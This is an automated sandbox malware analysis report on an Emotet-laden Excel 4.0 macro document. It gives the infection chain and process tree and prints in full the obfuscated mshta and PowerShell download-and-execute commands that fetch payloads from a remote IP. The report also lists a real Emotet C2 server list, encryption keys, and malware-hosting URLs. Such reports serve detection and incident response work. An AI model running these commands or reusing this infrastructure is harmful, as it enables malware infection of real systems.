Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
NZW-010122 BNUV-280122.xlsm

Overview

General Information

Sample Name:NZW-010122 BNUV-280122.xlsm
Analysis ID:562386
MD5:acbaebd7bb2090b795b481d48453b3fa
SHA1:a06b2a6d2a15d070262144854ea4ace65cb71892
SHA256:c81e4045b744f1e7aed46015f3f3a1de5078b95d908b966a56724965fb5b91e2
Infos:

Detection

Hidden Macro 4.0 Emotet
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Found malicious Excel 4.0 Macro
Found malware configuration
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Yara detected Emotet
Sigma detected: Windows Shell File Write to Suspicious Folder
Document contains OLE streams with names of living off the land binaries
Powershell drops PE file
Sigma detected: MSHTA Spawning Windows Shell
Hides that the sample has been downloaded from the Internet (zone.identifier)
Document exploit detected (process start blacklist hit)
Sigma detected: Suspicious MSHTA Process Patterns
Sigma detected: Microsoft Office Product Spawning Windows Shell
Sigma detected: Suspicious PowerShell Command Line
Found Excel 4.0 Macro with suspicious formulas
Machine Learning detection for dropped file
Sigma detected: Mshta Spawning Windows Shell
C2 URLs / IPs found in malware configuration
Drops PE files to the application program directory (C:\ProgramData)
Contains functionality to query locales information (e.g. system language)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Abnormal high CPU Usage
Found a hidden Excel 4.0 Macro sheet
Potential document exploit detected (unknown TCP traffic)
Searches for the Microsoft Outlook file path
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Found large amount of non-executed APIs
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to delete services
Creates a process in suspended mode (likely to inject code)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Creates files inside the system directory
Internet Provider seen in connection with other malware
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Potential document exploit detected (performs DNS queries)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Enables debug privileges
PE file contains an invalid checksum
Yara detected Xls With Macro 4.0
Connects to several IPs in different countries
Potential key logger detected (key state polling based)
Creates a window with clipboard capturing capabilities
Document contains embedded VBA macros
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Potential document exploit detected (performs HTTP gets)

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 380 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • cmd.exe (PID: 1960 cmdline: CMD.EXE /c mshta http://91.240.118.172/cc/vv/fe.html MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
      • mshta.exe (PID: 2756 cmdline: mshta http://91.240.118.172/cc/vv/fe.html MD5: 95828D670CFD3B16EE188168E083C3C5)
        • powershell.exe (PID: 3016 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/cc/vv/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X MD5: 852D67A27E454BD389FA7F02A8CBE23F)
          • cmd.exe (PID: 2428 cmdline: "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
            • rundll32.exe (PID: 2420 cmdline: C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq MD5: 51138BEEA3E2C21EC44D0932C71762A8)
              • rundll32.exe (PID: 2976 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\JooSee.dll",DllRegisterServer MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                • rundll32.exe (PID: 284 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Svccveo\pcrxj.oyh",ipGQHkspMd MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                  • rundll32.exe (PID: 2140 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Svccveo\pcrxj.oyh",DllRegisterServer MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                    • rundll32.exe (PID: 408 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Vinkqfnkvpzefpz\xhqzgf.ppi",igDWgBQ MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                      • rundll32.exe (PID: 560 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Vinkqfnkvpzefpz\xhqzgf.ppi",DllRegisterServer MD5: 51138BEEA3E2C21EC44D0932C71762A8)
  • cleanup

Malware Configuration

Threatname: Emotet

{"C2 list": ["160.16.102.168:80", "131.100.24.231:80", "200.17.134.35:7080", "207.38.84.195:8080", "212.237.56.116:7080", "58.227.42.236:80", "104.251.214.46:8080", "158.69.222.101:443", "192.254.71.210:443", "46.55.222.11:443", "45.118.135.203:7080", "107.182.225.142:8080", "103.75.201.2:443", "104.168.155.129:8080", "195.154.133.20:443", "159.8.59.82:8080", "110.232.117.186:8080", "45.142.114.231:8080", "41.76.108.46:8080", "203.114.109.124:443", "50.116.54.215:443", "209.59.138.75:7080", "185.157.82.211:8080", "164.68.99.3:8080", "162.214.50.39:7080", "138.185.72.26:8080", "178.63.25.185:443", "51.15.4.22:443", "81.0.236.90:443", "216.158.226.206:443", "45.176.232.124:443", "162.243.175.63:443", "212.237.17.99:8080", "45.118.115.99:8080", "129.232.188.93:443", "173.214.173.220:8080", "178.79.147.66:8080", "176.104.106.96:8080", "51.38.71.0:443", "173.212.193.249:8080", "217.182.143.207:443", "212.24.98.99:8080", "159.89.230.105:443", "79.172.212.216:8080", "212.237.5.209:443"], "Public Key": ["RUNLMSAAAADzozW1Di4r9DVWzQpMKT588RDdy7BPILP6AiDOTLYMHkSWvrQO5slbmr1OvZ2Pz+AQWzRMggQmAtO6rPH7nyx2", "RUNTMSAAAABAX3S2xNjcDD0fBno33Ln5t71eii+mofIPoXkNFOX1MeiwCh48iz97kB0mJjGGZXwardnDXKxI8GCHGNl0PFj5"]}

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
NZW-010122 BNUV-280122.xlsmSUSP_Excel4Macro_AutoOpenDetects Excel4 macro use with auto open / closeJohn Lambert @JohnLaTwC
  • 0x0:$header_docf: D0 CF 11 E0
  • 0x142a2:$s1: Excel
  • 0x15310:$s1: Excel
  • 0x311a:$Auto_Open: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A
NZW-010122 BNUV-280122.xlsmJoeSecurity_XlsWithMacro4Yara detected Xls With Macro 4.0Joe Security

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\Users\user\Desktop\NZW-010122 BNUV-280122.xlsSUSP_Excel4Macro_AutoOpenDetects Excel4 macro use with auto open / closeJohn Lambert @JohnLaTwC
    • 0x0:$header_docf: D0 CF 11 E0
    • 0x142a2:$s1: Excel
    • 0x15310:$s1: Excel
    • 0x311a:$Auto_Open: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A
    C:\Users\user\Desktop\NZW-010122 BNUV-280122.xlsJoeSecurity_XlsWithMacro4Yara detected Xls With Macro 4.0Joe Security
      C:\ProgramData\JooSee.dllJoeSecurity_Emotet_1Yara detected EmotetJoe Security

        Memory Dumps

        SourceRuleDescriptionAuthorStrings
        0000000C.00000002.551947539.0000000003061000.00000020.00000800.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
          00000010.00000002.676591356.00000000001C0000.00000040.00000800.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
            00000010.00000002.678280705.0000000002DC0000.00000040.00000800.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
              00000010.00000002.677632301.0000000002BA0000.00000040.00000800.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                0000000A.00000002.500040027.0000000002FE0000.00000040.00000800.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                  Click to see the 65 entries

                  Unpacked PEs

                  SourceRuleDescriptionAuthorStrings
                  16.2.rundll32.exe.2d30000.19.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                    16.2.rundll32.exe.2c30000.15.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                      16.2.rundll32.exe.2d60000.20.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                        10.2.rundll32.exe.210000.0.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                          10.2.rundll32.exe.9b0000.8.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                            Click to see the 97 entries

                            Sigma Overview

                            System Summary

                            barindex
                            Sigma detected: Windows Shell File Write to Suspicious Folder
                            Source: File createdAuthor: Florian Roth: Data: EventID: 11, Image: C:\Windows\System32\mshta.exe, ProcessId: 2756, TargetFilename: C:\Users\user\AppData\Local
                            Sigma detected: MSHTA Spawning Windows Shell
                            Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/cc/vv/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/cc/vv/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine|base64offset|contains: z+, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta http://91.240.118.172/cc/vv/fe.html, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 2756, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/cc/vv/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , ProcessId: 3016
                            Sigma detected: Suspicious MSHTA Process Patterns
                            Source: Process startedAuthor: Florian Roth: Data: Command: mshta http://91.240.118.172/cc/vv/fe.html, CommandLine: mshta http://91.240.118.172/cc/vv/fe.html, CommandLine|base64offset|contains: m, Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: CMD.EXE /c mshta http://91.240.118.172/cc/vv/fe.html, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1960, ProcessCommandLine: mshta http://91.240.118.172/cc/vv/fe.html, ProcessId: 2756
                            Sigma detected: Microsoft Office Product Spawning Windows Shell
                            Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: CMD.EXE /c mshta http://91.240.118.172/cc/vv/fe.html, CommandLine: CMD.EXE /c mshta http://91.240.118.172/cc/vv/fe.html, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 380, ProcessCommandLine: CMD.EXE /c mshta http://91.240.118.172/cc/vv/fe.html, ProcessId: 1960
                            Sigma detected: Suspicious PowerShell Command Line
                            Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/cc/vv/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/cc/vv/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine|base64offset|contains: z+, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta http://91.240.118.172/cc/vv/fe.html, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 2756, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/cc/vv/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , ProcessId: 3016
                            Sigma detected: Mshta Spawning Windows Shell
                            Source: Process startedAuthor: Florian Roth: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/cc/vv/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/cc/vv/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine|base64offset|contains: z+, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta http://91.240.118.172/cc/vv/fe.html, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 2756, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/cc/vv/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , ProcessId: 3016
                            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/cc/vv/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/cc/vv/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine|base64offset|contains: z+, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta http://91.240.118.172/cc/vv/fe.html, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 2756, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/cc/vv/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , ProcessId: 3016

                            Jbx Signature Overview

                            Click to jump to signature section

                            Show All Signature Results

                            AV Detection

                            barindex
                            Antivirus detection for URL or domain
                            Source: http://sep.dfwsolar.club/hzh3v/zCUz44VgIrN/PEAvira URL Cloud: Label: phishing
                            Source: http://ancyh.xyzAvira URL Cloud: Label: malware
                            Source: http://firstfitschool.com/83wg6z/9TRIk5HsoTQiiVWoX/PEAvira URL Cloud: Label: malware
                            Source: http://mycloud.suplitecmo.com/Fox-CCFS/zBdGqiyW1HTZD2j/PEAvira URL Cloud: Label: malware
                            Source: http://sep.dfwsolar.club/hzh3v/zAvira URL Cloud: Label: malware
                            Source: http://journeypropertysolutions.com/cterq/FoPrW8qKzgIj3E8m/Avira URL Cloud: Label: malware
                            Source: http://weezual.fr/ju9c/twEHJDCvNwGimD/Avira URL Cloud: Label: malware
                            Source: http://danahousecare.com/wp-contAvira URL Cloud: Label: malware
                            Source: http://chupahfashion.com/eh6bwxk/bowptl/F2sib90zZsqJ44/bQ8VXS/PEAvira URL Cloud: Label: malware
                            Source: http://mycloud.suplitecmo.com/Fox-CCFS/zBdGqiyW1HTZD2j/Avira URL Cloud: Label: malware
                            Source: http://91.240.118.172/cc/vv/fe.pngAvira URL Cloud: Label: malware
                            Source: http://danahousecare.com/wp-content/cache/nAZV1f5Bh9CFmBtl2J/PEAvira URL Cloud: Label: malware
                            Source: http://sep.dfwsolar.club/hzh3v/zCUz44VgIrN/Avira URL Cloud: Label: phishing
                            Source: http://journeypropertysolutions.com/cterq/FoPrW8qKzgIj3E8m/PEAvira URL Cloud: Label: malware
                            Source: http://firstfitschool.com/83wg6zAvira URL Cloud: Label: phishing
                            Source: http://91.240.118.172/cc/vv/fe.html#HAvira URL Cloud: Label: malware
                            Source: https://lambayeque.apiperu.net.pe/assets/whnYzDBLH/Avira URL Cloud: Label: malware
                            Source: http://ancyh.xyz/assets/Pcxv1k5/Avira URL Cloud: Label: malware
                            Source: http://ancyh.xyz/assets/Pcxv1k5/PEAvira URL Cloud: Label: malware
                            Source: http://weezual.fr/ju9c/twEHJDCvNwGimD/PEAvira URL Cloud: Label: malware
                            Source: https://www.belajarngaji.shop/wp-admin/zVhSqHo7Fi2ulNeN1/Avira URL Cloud: Label: malware
                            Source: https://lambayeque.apiperu.net.pe/assets/whnYzDBLH/PEAvira URL Cloud: Label: malware
                            Source: http://danahousecare.com/wp-content/cache/nAZV1f5Bh9CFmBtl2J/Avira URL Cloud: Label: malware
                            Source: https://www.belajarngaji.shop/wp-admin/zVhSqHo7Fi2ulNeN1/PEAvira URL Cloud: Label: malware
                            Source: http://michaelcrompton.co.uk/wp-admin/G/Avira URL Cloud: Label: malware
                            Source: http://michaelcrompton.co.uk/wp-admin/G/PEAvira URL Cloud: Label: malware
                            Source: http://chupahfashion.com/eh6bwxkAvira URL Cloud: Label: malware
                            Source: http://91.240.118.172/cc/vv/fe.htmlAvira URL Cloud: Label: malware
